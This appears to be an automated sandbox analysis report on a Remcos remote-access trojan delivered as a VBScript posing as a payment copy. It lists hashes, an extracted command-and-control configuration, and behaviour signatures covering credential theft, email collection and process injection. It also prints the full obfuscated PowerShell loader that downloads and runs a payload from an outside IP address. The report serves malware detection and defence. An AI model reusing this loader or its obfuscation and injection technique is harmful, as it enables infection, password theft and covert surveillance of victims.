remcos | 7469a174199a6068c3534b0698c75ebf754e92408f0607eb00cf9d3ea86e2b11

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 09:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Copy.vbs
Size

22KB
MD5

98016b4c57fc38530cc0586ed0782b09
SHA1

db01e9695d8eb3f91692530890978877d679bdc9
SHA256

7469a174199a6068c3534b0698c75ebf754e92408f0607eb00cf9d3ea86e2b11
SHA512

d3f129c2924e755bae7669f4fb9c36bfabe245e8f307ccf3346794e2ca6b911e6772a3a25215daa4d7a6658c200e0fe07b3ca701652d0546c68b5ce4780ef935
SSDEEP

384:TreTG9A2Mu5ELeeAu7ykTvUKS3u7091jpq0W/c3345sb4WB6eTG7Ol/:Xe0L5U/gkT5Pyjs0WYH4WPpl/

Score

10^/10

remcos remotehost collection rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

103.237.87.40:1993

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-Y1ZTA5
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral2/memory/2932-64-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral2/memory/4676-61-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral2/memory/2932-64-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral2/memory/4676-61-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1008-62-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2932-64-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4676-61-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 2428 WScript.exe
7 2532 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2608 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2392 powershell.exe
2608 wab.exe

flow	pid	process
4	2428	WScript.exe
7	2532	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

pid	process
2608	wab.exe

pid	process
2392	powershell.exe
2608	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 2392 set thread context of 2608	2392	powershell.exe	wab.exe
PID 2608 set thread context of 4676	2608	wab.exe	wab.exe
PID 2608 set thread context of 2932	2608	wab.exe	wab.exe
PID 2608 set thread context of 1008	2608	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exewab.exewab.exe

pid process

2532 powershell.exe
2532 powershell.exe
2392 powershell.exe
2392 powershell.exe
2392 powershell.exe
4676 wab.exe
4676 wab.exe
1008 wab.exe
1008 wab.exe
4676 wab.exe
4676 wab.exe
Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exewab.exe

pid process

2392 powershell.exe
2608 wab.exe
2608 wab.exe
2608 wab.exe
2608 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2532 powershell.exe
Token: SeDebugPrivilege 2392 powershell.exe
Token: SeDebugPrivilege 1008 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

2608 wab.exe

pid	process
2532	powershell.exe
2532	powershell.exe
2392	powershell.exe
2392	powershell.exe
2392	powershell.exe
4676	wab.exe
4676	wab.exe
1008	wab.exe
1008	wab.exe
4676	wab.exe
4676	wab.exe

pid	process
2392	powershell.exe
2608	wab.exe
2608	wab.exe
2608	wab.exe
2608	wab.exe

description	pid	process
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	1008	wab.exe

pid	process
2608	wab.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.exe

description	pid	process	target process
PID 2428 wrote to memory of 2532	2428	WScript.exe	powershell.exe
PID 2428 wrote to memory of 2532	2428	WScript.exe	powershell.exe
PID 2532 wrote to memory of 2080	2532	powershell.exe	cmd.exe
PID 2532 wrote to memory of 2080	2532	powershell.exe	cmd.exe
PID 2532 wrote to memory of 2392	2532	powershell.exe	powershell.exe
PID 2532 wrote to memory of 2392	2532	powershell.exe	powershell.exe
PID 2532 wrote to memory of 2392	2532	powershell.exe	powershell.exe
PID 2392 wrote to memory of 4520	2392	powershell.exe	cmd.exe
PID 2392 wrote to memory of 4520	2392	powershell.exe	cmd.exe
PID 2392 wrote to memory of 4520	2392	powershell.exe	cmd.exe
PID 2392 wrote to memory of 2608	2392	powershell.exe	wab.exe
PID 2392 wrote to memory of 2608	2392	powershell.exe	wab.exe
PID 2392 wrote to memory of 2608	2392	powershell.exe	wab.exe
PID 2392 wrote to memory of 2608	2392	powershell.exe	wab.exe
PID 2392 wrote to memory of 2608	2392	powershell.exe	wab.exe
PID 2608 wrote to memory of 4676	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 4676	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 4676	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 4676	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 2932	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 2932	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 2932	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 2932	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 3332	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 3332	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 3332	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 1008	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 1008	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 1008	2608	wab.exe	wab.exe
PID 2608 wrote to memory of 1008	2608	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Copy.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds';If (${host}.CurrentCulture) {$Golf++;}Function Hosernes($Vulpecular){$systemadministratorens=$Vulpecular.Length-$Golf;$Equiaxed='SUBsTRI';$Equiaxed+='ng';For( $Ringmuren=7;$Ringmuren -lt $systemadministratorens;$Ringmuren+=8){$Indmurer+=$Vulpecular.$Equiaxed.Invoke( $Ringmuren, $Golf);}$Indmurer;}function Hjttaleranlggenes($Amalgamering){ & ($Underkanterne) ($Amalgamering);}$Musikledsagelsen=Hosernes 'FaksimiM Melanco Usmmelz rappori ChemialmarsupilBy,gesaa Frafly/Mat tin5invalid.Udposen0Tomahaw Tidsbi(Cr ceinWUnv,porispousaln RuflendIndenrioEkspediwNaermessObje ti Begr,dgNVoc,tioTAddebt. Ia.ttag1Lysthus0femhund.Wakiupt0antimon;sharecr P,omulgWVanrgtei Roeg,lnTumoral6 Gummis4Balerfa;Unspoke HandigaxAmtsgym6Vaskens4Bundlse;Hjemkal Thora,kr SalgsvvE.benpe:Prsentx1Pendult2pewtere1 manife.Postbru0 Smit,l)Agrac j MedullaGForsdedeMonosercB,ndevikHermelioLydkort/Stileh 2 Ven,re0Degnoti1Opht,al0Blideli0angelic1 rbejde0 Bottic1Valkyri RumaflyFSeponericentralrKildespeTitanolf espekto SepoysxRebric,/Tyndst,1Informa2pro,ary1 nderbo. snepp.0Bikager ';$Serologer=Hosernes 'Dis,preU Aman ss,anchmaeKnived rGr enhi- ClathrAKildeskgImperiee LufthunUpholdstSidelin ';$skriftsted=Hosernes 'NskebenhRecipietOwlg,astOffend,pRetfae : B.ndli/Numidia/Smocksy1Platema0Polaran3 arong.Compute2Edgrewd3arbejds7 Vrd,br.Subageu8Feoffee6Pedetic.Forflad2Headbox4,rgusje7Informa/ b,lemrCExtrapeaHinma nr Datas pDurndeseconfirmtUngodlym.amponeaSuperexkCon,radi.strocynI,troprg Solenn.B,radiapPhonaticInterxyxubesind ';$Kilogrammets=Hosernes 'Bag,ave> Re,ntr ';$Underkanterne=Hosernes 'My holoiforvarmeD,ddiecxunderco ';$Fyrreaarsfdselsdagen='Codling';$Recipientkvalitetsinteresses = Hosernes 'CrabfiseS eltevcGewgawshaggraveo,oncede Unsnib%Forci,la evelopp,imidiapPlesio dTerrorraTilri.ntTimelofaScalple%Ve ning\SpringvRPurismee Triakit Disce s Ne.priv Eft,rmiEthnogrdRe ulfunLejemore Klfte rPhanicms.ammert. unreprFUdr,nsnoMalbethrgulping Brledes&Trevang& Nynor Spr,ngee Enaa,icFlittinh TevarmoPetalif Id ldytFremmar ';Hjttaleranlggenes (Hosernes 'Kravlen$Resoje,gUeue eolScatlanosm,sherb OlivenaD ikkenlCheatin:Mikrofos Ud indlPinstrivLic enia agotoml NostaldDisnew eG.rshwirCleavine Raadfrn Rettig=Knappen(Plyndric.emicubm Ter.cad Logikk iskon/Overta cRotter. Muktatm$Hjer,esRDavidiceHeallescdelig tiUdflugtpViklingi Lereg eK.ydshenS.arntytFlogmaskDenuncivVedf,era verneulCylin,riBarkbiltAlvorsteS rabnst Hjarnss Trabeai Ha,erenDisket,tFadlsaneNadversr.paltebeJentacusMisvksts OptimieMassakrsTromped) indlaa ');Hjttaleranlggenes (Hosernes 'Steevel$MartyrigFrugthal AnalogoDefrostbmawbouna .ypocal.aritas:Ha.vensVTilbageaOm annenTachoscaGenanskdBa.lepraBeskytttLggebroeRygskkesFor.rud= Pejles$DykkesksDygtiggkUnposturphenocoiSotterffkursusltUnrede.sCh ckkotBuksekne RyperndCableca.HomesicsAdeligepLrdomsslTingermiBrrupsktHeltal.(Interva$ AdelsmKFutha ciCutinizlAl weiloUdflippg seudonrInosculaRekvisimBroderem tusindeSygehustUdlig.esLastpra) nflav ');Hjttaleranlggenes (Hosernes ' Sports[Bry mesNNordh ueoverbo,tReinves.AfbrydeS,nddrivePlastfirPhenoxiv SikriniC,ayanecOverconeSubcu.aPVe.tersoBes.ingiSeismolnhippocrtTheopatMNonemera Reformnreproara Sprog,gBrand.reJon,nsarster,be]Kerauno:Seminar:QuiteveSFlaredaeAddiealcOpsummou SecretrPhysostiFlyst rtP ghlityNonintePIndi.crr FlatwaoPrognattEbonitsoBlddelscMis isaoRush,eslHaan,gr S,rudse=Ettalle Hovedme[StencilNForkerteCamb djt Semire. ,ilvarSPyridineBrandbacRevisiouMaskinprKubis.ei IndsamtDeratisyteks ehPPolysi.rM,crobuoL.kkemetRandonkoKontordcPeri,heoOpstilllHypogloTBeret,eyAbbederpEndevaeeHenled ] Sandst:Udbrdro: Def,ayTanskuellCi kulrsFireogt1Leahdia2 Gen.pe ');$skriftsted=$Vanadates[0];$Unprelatical= (Hosernes 'Brnesag$ Devic,gVidere,lDefilero Intensb ondecaGombostl .erous:Helsi eUInvigilnscramblsOversttiVocabilmPractismPsyc aleKn.ghtlrPhysciaiInadvisngdningsg Musale=CirkulaNSporvejeForlystwJ.nkiep-DisgracOPollamsbCe ebeljFstereneNdringsc Frem atAfsende Flande,SWingedoyudkommas VigasatPopula.eKvar.sumSu,erpr.S,faneuNRedefeceE lipsot ritikk.Skiv ngWCastoroeDyrebarbSkandalCRepatrilChoroloiOrthogoe Sikkatn uricatt');$Unprelatical+=$slvalderen[1];Hjttaleranlggenes ($Unprelatical);Hjttaleranlggenes (Hosernes 'ext nsi$MiteexpUNutidsmn KamuflsliviasgiFredsbemf,ygtnimSt,pulaeChefredrSk.rlagiActinian SladregAntiper.TchervoHAntiabre,nsuffiaA.tivendH.rnioleTabetvir Ultrass.ejkant[Maraisu$CopubliSRe iteseLi etnorVerneysoPectinilPlied,aoUnbelieg DiascheCrashinrT,ssest]Mischan=intoler$ MarrieMAarendeu.aalschs .rustei PraxeskuncharmlLreproceSinapisd QuenchsTransfoa ictualg H,lvnoeBlodsnklHyd.osismidnig.ePalmatinVentage ');$Venules=Hosernes ' Spelld$SeemlieUJudis,inMaalstns HarengiRemer,imbitt rsmVowessheKonfusirStraffei .eskien HeavergGardier.SkredetDLsbareso Manegew Overlan SmaabolThirstloBookfolaE,teriedUb.vidsFDiskrepiDemibobl PoppyceNondisp(Rescrib$nettovrsG.nvejek manglerSculperiBlodansfrkenerst NoncausBaglinit MonopaeSierrandOrdensp,Forkbal$KlinikdHKuratoraSe,suallSubv.rsvP.nuelaf .versee IndoptmStningss Bst,upaHelautoa Ss gdur Kapelmi Efter g Ba,lepeInclina1Spirit,8Krimisc1Bord,yl)Wyverun ';$Halvfemsaarige181=$slvalderen[0];Hjttaleranlggenes (Hosernes ' Feriek$resumergforstralDerigenoSpulingbUnweariaunprival Bycen.: Nitr.gPUdspilea,emtesarDukk,staPrivatepU,enerthVengea,rNarkoceaJerupwasst.nrkeiRe.nskaaKlejnee=Nedrivn(SupersaT SquinteReviso.sSnusfortstue.ug-MicrocoP ByrledaUdkiksptLithodehFor,rug Postepi$SinuvenH LaudataMultipllPixilatvHalsretfIsarithe fastelm holdnes Frustraliente aUdlngslrTkni,gei SagsbegUnifor eDevoutl1Betynge8New.own1 Taftfo)Ritte.d ');while (!$Paraphrasia) {Hjttaleranlggenes (Hosernes 'Uncampa$InoffengSca prvlK ntrolo.arbarebAstero.areranp,lFlleskr:IbrugtaDBenradee Im.tatsNonpersp KoterdeVedkommkExpurgetVideobae,alaeobnTorveda=Rygelse$Splida,tTranspar HaircuuHi,hbale.hinook ') ;Hjttaleranlggenes $Venules;Hjttaleranlggenes (Hosernes 'DeodoriSundskylt UndersaUdskiftrSpiculut Reboun-AngliseSBucklerl GinglyeRingtaieBrusettpSubdrui Diarree4 litte. ');Hjttaleranlggenes (Hosernes 'Fashing$EntheosgEksamenlPupilleoRllikerbLamentaaOutbannl hagrin:KanalerP Keypada S umrer L,byriaTilbagepFlekskoh MistenrPuttenda,ervilesGennemli Archlua Slikke=Work an(KomondoT Vo.ticeEpidia.sSpectrot Foster-ruminatPBrevvekaInbreedtHuzvarehP,pnser Raasto$Katte.jHBoniteraVelaturlBenightvWehralbfEnevoldeSnorketmAliquots horkiaHussybuaPeritonrStyrtbji BalancgForvalteArbe ds1 C.ncer8Unyeane1Erlggen)Nonsana ') ;Hjttaleranlggenes (Hosernes 'Borger,$ aloneng DeputilkvldefroBufote,bMottoeraTheat,rlBarazac: Stamm,P Es,phar Komp.ia.ndeciskgeneralsMetrizaiPoultrys Dubbovn Sikkerdprecir,rHullabainervimunFam.liegcl.bbineWilinesnLyttaef1 Balsam3Oliefyr9 Progra= Fidusm$Intervig MaksimlJugeredosoftbacbEpi,cleaEle trilPedas.u:Foste.sF BetingrexistendSammensiLinjedegGtt.rierKammedeeIldragetBestikktdiscoveeResolutr .ordannSpiredyeDeliber+ Epopee+Calyptr%Glub.ke$ nahumpVp adesea Kogt,enElekt.oaMantuasd isarmaa EpiphatF yingiePanorers Sign.l.ArchplucSubtraho Supracu ireannn Skabelt Palaeo ') ;$skriftsted=$Vanadates[$Praksisndringen139];}$Opposit=316532;$bankekds=30167;Hjttaleranlggenes (Hosernes ' .rdkla$UnderlegOversetlStandaroundstnvbOari paaEmbarkulUforsta:SnorksoU OmklasvKoe.sisoMump,rirsocialcnSla ekohTrans,oeFyreseddVer ifu A,elard= Fughet vaskomGvalo,uneEpoxy.atGenerat- Disa.pCElectrooA lersin Skjoldt Skat eeSi nficnFolke,itBarthia Forldea$PinjrakHFrinumraUddatablGrv.ingv igeretfPr.image U.pindmTeorichsBolarenaHisoveraNusser r KonseriDemocragPbelag.eSivenes1Transpa8Udblsni1Konsumf ');Hjttaleranlggenes (Hosernes ' Cornif$ Gu.umigStorgo lForfiltob,stedabNihcancaWatchhol Overfl:Kil,calMFormelli Bagwors ToldpopForankruDatidigtIndvoldtWhistleiHalvdannDuttetsgFor,etn Lynched= Turner Odontot[ SuffecSPreoccuyGvestessDi putat OevredeOvero,fm edrin.DepraveCCarneoloSpallspnFolkfotvMetalleeSatyrisr,endbartvobisga].opfolk:Bill,dh:udkonkuFsektorsrAfnatiooNonillumAdresseBMagtspia igtelss ommyereBrazils6 U.iten4 P eridS Cowf,ot pe.levrSep,imaiNondir.nKunstakg.tenogr(.ealisa$UncrumpU uperevUndergroNo.coherBruger,nP eoccuh UnisepeUrbanisdXiphosu)Beklage ');Hjttaleranlggenes (Hosernes 'Fremfus$JenaabngPassemelEllekiloB,naadobOdmarkoa Lal palLatestp:RigtigsiMic,onimRondaweb buketti DikessbAirligheSemicosrstatsejsBohem.b Opsgn.n=taberen Hyb,nkr[In dmmeSPukk,lsyVelbeslsVrdi,ovtR melige PterotmHyperki. BortelTCigarmaeRememorxGri mestSe,undy.berigelEUst.rlinSiegernc Lok,mooEnergipd Disfavi IsocyanResurregBoxbush],lwinhe:Brahman:ShoedepARisk esSVestjydC BronzeIS ivelsI.efence.TringciGStrickse Teks,etU vikliSGuaguantFa sterrOrchieciop,tninn MervfogCe.eban(Al enhe$Liga urMHen,tani Hypoc sStkningpPara.rau eft.rtt kyggestUdklknii,edsaltnGalninggAfskovn)Fiskepl ');Hjttaleranlggenes (Hosernes '.enophi$Natanieg dublerl ,iberaogymnostbRes.edlaJrgineslForeimp:DioxinsD UdslynuEmulsiofUdmn,esfVandetteIn laeslGennemscutriculoBintjeka Midd ltEmbo.tee Ove,vurUlidelin Cam,hoeBlokade=Checken$Unpla tiFrkenermm,adedibPowe,lei.ndgangbBurstine .ntrffr Bolshis Pounce.UnplashsEleva,ouPenaeagbBrochursT.ntacutEmydianrPygobraiGuar,ranKa akomg Morefo(uranome$SpaltniOfremdrapUnimpowpKulde,yoDa nebrs MiswenipeplesstAbomina,Pyrheli$ risikobInd,indasote.ionSatanisk Styr ne BrevskkLovtidedUn.uckismanip l)Gni.end ');Hjttaleranlggenes $Duffelcoaterne;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Retsvidners.For && echo t"
3⤵
PID:2080

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds';If (${host}.CurrentCulture) {$Golf++;}Function Hosernes($Vulpecular){$systemadministratorens=$Vulpecular.Length-$Golf;$Equiaxed='SUBsTRI';$Equiaxed+='ng';For( $Ringmuren=7;$Ringmuren -lt $systemadministratorens;$Ringmuren+=8){$Indmurer+=$Vulpecular.$Equiaxed.Invoke( $Ringmuren, $Golf);}$Indmurer;}function Hjttaleranlggenes($Amalgamering){ & ($Underkanterne) ($Amalgamering);}$Musikledsagelsen=Hosernes 'FaksimiM Melanco Usmmelz rappori ChemialmarsupilBy,gesaa Frafly/Mat tin5invalid.Udposen0Tomahaw Tidsbi(Cr ceinWUnv,porispousaln RuflendIndenrioEkspediwNaermessObje ti Begr,dgNVoc,tioTAddebt. Ia.ttag1Lysthus0femhund.Wakiupt0antimon;sharecr P,omulgWVanrgtei Roeg,lnTumoral6 Gummis4Balerfa;Unspoke HandigaxAmtsgym6Vaskens4Bundlse;Hjemkal Thora,kr SalgsvvE.benpe:Prsentx1Pendult2pewtere1 manife.Postbru0 Smit,l)Agrac j MedullaGForsdedeMonosercB,ndevikHermelioLydkort/Stileh 2 Ven,re0Degnoti1Opht,al0Blideli0angelic1 rbejde0 Bottic1Valkyri RumaflyFSeponericentralrKildespeTitanolf espekto SepoysxRebric,/Tyndst,1Informa2pro,ary1 nderbo. snepp.0Bikager ';$Serologer=Hosernes 'Dis,preU Aman ss,anchmaeKnived rGr enhi- ClathrAKildeskgImperiee LufthunUpholdstSidelin ';$skriftsted=Hosernes 'NskebenhRecipietOwlg,astOffend,pRetfae : B.ndli/Numidia/Smocksy1Platema0Polaran3 arong.Compute2Edgrewd3arbejds7 Vrd,br.Subageu8Feoffee6Pedetic.Forflad2Headbox4,rgusje7Informa/ b,lemrCExtrapeaHinma nr Datas pDurndeseconfirmtUngodlym.amponeaSuperexkCon,radi.strocynI,troprg Solenn.B,radiapPhonaticInterxyxubesind ';$Kilogrammets=Hosernes 'Bag,ave> Re,ntr ';$Underkanterne=Hosernes 'My holoiforvarmeD,ddiecxunderco ';$Fyrreaarsfdselsdagen='Codling';$Recipientkvalitetsinteresses = Hosernes 'CrabfiseS eltevcGewgawshaggraveo,oncede Unsnib%Forci,la evelopp,imidiapPlesio dTerrorraTilri.ntTimelofaScalple%Ve ning\SpringvRPurismee Triakit Disce s Ne.priv Eft,rmiEthnogrdRe ulfunLejemore Klfte rPhanicms.ammert. unreprFUdr,nsnoMalbethrgulping Brledes&Trevang& Nynor Spr,ngee Enaa,icFlittinh TevarmoPetalif Id ldytFremmar ';Hjttaleranlggenes (Hosernes 'Kravlen$Resoje,gUeue eolScatlanosm,sherb OlivenaD ikkenlCheatin:Mikrofos Ud indlPinstrivLic enia agotoml NostaldDisnew eG.rshwirCleavine Raadfrn Rettig=Knappen(Plyndric.emicubm Ter.cad Logikk iskon/Overta cRotter. Muktatm$Hjer,esRDavidiceHeallescdelig tiUdflugtpViklingi Lereg eK.ydshenS.arntytFlogmaskDenuncivVedf,era verneulCylin,riBarkbiltAlvorsteS rabnst Hjarnss Trabeai Ha,erenDisket,tFadlsaneNadversr.paltebeJentacusMisvksts OptimieMassakrsTromped) indlaa ');Hjttaleranlggenes (Hosernes 'Steevel$MartyrigFrugthal AnalogoDefrostbmawbouna .ypocal.aritas:Ha.vensVTilbageaOm annenTachoscaGenanskdBa.lepraBeskytttLggebroeRygskkesFor.rud= Pejles$DykkesksDygtiggkUnposturphenocoiSotterffkursusltUnrede.sCh ckkotBuksekne RyperndCableca.HomesicsAdeligepLrdomsslTingermiBrrupsktHeltal.(Interva$ AdelsmKFutha ciCutinizlAl weiloUdflippg seudonrInosculaRekvisimBroderem tusindeSygehustUdlig.esLastpra) nflav ');Hjttaleranlggenes (Hosernes ' Sports[Bry mesNNordh ueoverbo,tReinves.AfbrydeS,nddrivePlastfirPhenoxiv SikriniC,ayanecOverconeSubcu.aPVe.tersoBes.ingiSeismolnhippocrtTheopatMNonemera Reformnreproara Sprog,gBrand.reJon,nsarster,be]Kerauno:Seminar:QuiteveSFlaredaeAddiealcOpsummou SecretrPhysostiFlyst rtP ghlityNonintePIndi.crr FlatwaoPrognattEbonitsoBlddelscMis isaoRush,eslHaan,gr S,rudse=Ettalle Hovedme[StencilNForkerteCamb djt Semire. ,ilvarSPyridineBrandbacRevisiouMaskinprKubis.ei IndsamtDeratisyteks ehPPolysi.rM,crobuoL.kkemetRandonkoKontordcPeri,heoOpstilllHypogloTBeret,eyAbbederpEndevaeeHenled ] Sandst:Udbrdro: Def,ayTanskuellCi kulrsFireogt1Leahdia2 Gen.pe ');$skriftsted=$Vanadates[0];$Unprelatical= (Hosernes 'Brnesag$ Devic,gVidere,lDefilero Intensb ondecaGombostl .erous:Helsi eUInvigilnscramblsOversttiVocabilmPractismPsyc aleKn.ghtlrPhysciaiInadvisngdningsg Musale=CirkulaNSporvejeForlystwJ.nkiep-DisgracOPollamsbCe ebeljFstereneNdringsc Frem atAfsende Flande,SWingedoyudkommas VigasatPopula.eKvar.sumSu,erpr.S,faneuNRedefeceE lipsot ritikk.Skiv ngWCastoroeDyrebarbSkandalCRepatrilChoroloiOrthogoe Sikkatn uricatt');$Unprelatical+=$slvalderen[1];Hjttaleranlggenes ($Unprelatical);Hjttaleranlggenes (Hosernes 'ext nsi$MiteexpUNutidsmn KamuflsliviasgiFredsbemf,ygtnimSt,pulaeChefredrSk.rlagiActinian SladregAntiper.TchervoHAntiabre,nsuffiaA.tivendH.rnioleTabetvir Ultrass.ejkant[Maraisu$CopubliSRe iteseLi etnorVerneysoPectinilPlied,aoUnbelieg DiascheCrashinrT,ssest]Mischan=intoler$ MarrieMAarendeu.aalschs .rustei PraxeskuncharmlLreproceSinapisd QuenchsTransfoa ictualg H,lvnoeBlodsnklHyd.osismidnig.ePalmatinVentage ');$Venules=Hosernes ' Spelld$SeemlieUJudis,inMaalstns HarengiRemer,imbitt rsmVowessheKonfusirStraffei .eskien HeavergGardier.SkredetDLsbareso Manegew Overlan SmaabolThirstloBookfolaE,teriedUb.vidsFDiskrepiDemibobl PoppyceNondisp(Rescrib$nettovrsG.nvejek manglerSculperiBlodansfrkenerst NoncausBaglinit MonopaeSierrandOrdensp,Forkbal$KlinikdHKuratoraSe,suallSubv.rsvP.nuelaf .versee IndoptmStningss Bst,upaHelautoa Ss gdur Kapelmi Efter g Ba,lepeInclina1Spirit,8Krimisc1Bord,yl)Wyverun ';$Halvfemsaarige181=$slvalderen[0];Hjttaleranlggenes (Hosernes ' Feriek$resumergforstralDerigenoSpulingbUnweariaunprival Bycen.: Nitr.gPUdspilea,emtesarDukk,staPrivatepU,enerthVengea,rNarkoceaJerupwasst.nrkeiRe.nskaaKlejnee=Nedrivn(SupersaT SquinteReviso.sSnusfortstue.ug-MicrocoP ByrledaUdkiksptLithodehFor,rug Postepi$SinuvenH LaudataMultipllPixilatvHalsretfIsarithe fastelm holdnes Frustraliente aUdlngslrTkni,gei SagsbegUnifor eDevoutl1Betynge8New.own1 Taftfo)Ritte.d ');while (!$Paraphrasia) {Hjttaleranlggenes (Hosernes 'Uncampa$InoffengSca prvlK ntrolo.arbarebAstero.areranp,lFlleskr:IbrugtaDBenradee Im.tatsNonpersp KoterdeVedkommkExpurgetVideobae,alaeobnTorveda=Rygelse$Splida,tTranspar HaircuuHi,hbale.hinook ') ;Hjttaleranlggenes $Venules;Hjttaleranlggenes (Hosernes 'DeodoriSundskylt UndersaUdskiftrSpiculut Reboun-AngliseSBucklerl GinglyeRingtaieBrusettpSubdrui Diarree4 litte. ');Hjttaleranlggenes (Hosernes 'Fashing$EntheosgEksamenlPupilleoRllikerbLamentaaOutbannl hagrin:KanalerP Keypada S umrer L,byriaTilbagepFlekskoh MistenrPuttenda,ervilesGennemli Archlua Slikke=Work an(KomondoT Vo.ticeEpidia.sSpectrot Foster-ruminatPBrevvekaInbreedtHuzvarehP,pnser Raasto$Katte.jHBoniteraVelaturlBenightvWehralbfEnevoldeSnorketmAliquots horkiaHussybuaPeritonrStyrtbji BalancgForvalteArbe ds1 C.ncer8Unyeane1Erlggen)Nonsana ') ;Hjttaleranlggenes (Hosernes 'Borger,$ aloneng DeputilkvldefroBufote,bMottoeraTheat,rlBarazac: Stamm,P Es,phar Komp.ia.ndeciskgeneralsMetrizaiPoultrys 